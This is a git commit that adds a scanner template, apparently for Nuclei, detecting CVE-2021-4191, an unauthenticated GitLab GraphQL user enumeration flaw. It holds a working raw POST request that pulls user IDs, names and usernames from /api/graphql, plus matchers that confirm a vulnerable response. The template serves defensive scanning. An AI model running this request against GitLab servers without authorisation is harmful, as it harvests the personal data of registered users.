Add template for CVE-2021-4191

2022-03-04 16:56:50 -05:00 · 2022-03-04 16:56:50 -05:00 · d18e7535d2
parent 71172d6eb9
commit d18e7535d2
1 changed files with 48 additions and 0 deletions
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@ -0,0 +1,48 @@
+id: CVE-2021-4191
+
+info:
+  name: GitLab GraphQL API User Enumeration
+  author: zsusac
+  severity: medium
+  description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
+  reference:
+    - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
+    - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
+  classification:
+    cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2021-4191
+    cwe-id: CWE-359
+  tags: cve,cve2022,gitlab,api,graphql,enumeration,unauthenticated
+
+requests:
+- raw:
+  - |-
+    POST /api/graphql HTTP/1.1
+    Host: {{Hostname}}
+    Content-Length: 917
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+    Content-Type: application/json
+    Accept: */*
+    Origin: {{Hostname}}
+    Referer: {{Hostname}}/-/graphql-explorer
+    Accept-Encoding: gzip, deflate
+    Accept-Language: en-US,en;q=0.9
+    Connection: close
+
+    {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n#     {\n#       field(arg: \"value\") {\n#         subField\n#       }\n#     }\n#\n# Keyboard shortcuts:\n#\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\n#\n#       Run Query:  Ctrl-Enter (or press the play button above)\n#\n#   Auto Complete:  Ctrl-Space (or just start typing)\n#\n\n{\n  users {\n    nodes {\n      id\n      name\n      username\n    }\n  }\n}","variables":null,"operationName":null}
+
+  matchers-condition: and
+  matchers:
+  - type: word
+    part: body
+    words:
+    - '"data"'
+    - '"users"'
+    - '"nodes"'
+    - '"id"'
+    - 'gid://'
+    condition: and
+  - type: status
+    status:
+    - 200